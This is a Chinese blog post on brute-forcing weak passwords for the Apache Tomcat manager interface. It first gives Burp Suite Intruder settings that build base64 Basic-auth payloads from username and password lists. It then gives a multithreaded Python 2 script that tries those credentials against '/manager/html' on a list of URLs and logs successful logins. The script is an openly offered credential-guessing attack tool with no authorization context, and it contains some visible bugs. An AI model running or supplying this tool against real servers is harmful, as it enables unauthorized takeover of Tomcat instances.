1.tomcat 用burpsuit进行弱口令爆破

先抓包


发送到inturder

payload type 选择custom iterater
第一个payload选用户名文件,第二个payload用 : 第三个选密码文件

设置base64加密,和去掉URL编码

开始攻击,得到用户名密码

2.用python脚本进行爆破

目前正在学习python,

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#by.really
import sys
import requests
import threading
import Queue
import time
import base64
import os
#headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)'}
u=Queue.Queue()
p=Queue.Queue()
n=Queue.Queue()
#def urllist()
urls=open('url.txt','r')
def urllist():
    for url in urls:
        url=url.rstrip()
        u.put(url)
def namelist():
    names=open('name.txt','r')
    for name in names:
        name=name.rstrip()
        n.put(name)

def passlist():
    passwds=open('pass.txt','r')
    for passwd in passwds:
        passwd=passwd.rstrip()
        p.put(passwd)

def weakpass(url):
    namelist()
    while not n.empty():
        name =n.get()
        #print name
        passlist()
        while not p.empty():
            good()
            #name = n.get()
            passwd = p.get()
            #print passwd
            headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))}
            try:
                r =requests.get(url,headers=headers,timeout=3)
                #print r.status_code
                if r.status_code==200:
                    print '[turn] ' +url+' '+name+':'+passwd
                    f = open('good.txt','a+')
                    f.write(url+' '+name+':'+passwd+'\n')
                    f.close()
                else:
                    print '[false] ' + url+' '+name+':'+passwd
            except:
                print '[false] '  + url+' '+name+':'+passwd

def list():
    while u.empty():
        url = u.get()
        weakpass(name,url)

def thread():
    urllist()
    tsk=[]
    for i in open('url.txt').read().split('\n'):
        i = i + '/manager/html'
        t = threading.Thread(target=weakpass,args=(i,))
        tsk.append(t)
    for t in tsk:
        t.start()
        t.join(1)
        #print "current has %d threads" % (threading.activeCount() - 1)
def good():
    good_ = 0
    for i in open('good.txt').read().split('\n'):
        good_+=1
    os.system('title "weakpass------good:%s"' % (good_))

if __name__=="__main__":
   # alllist()
    thread()

版权声明:本文为hackxf原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/hackxf/p/8949710.html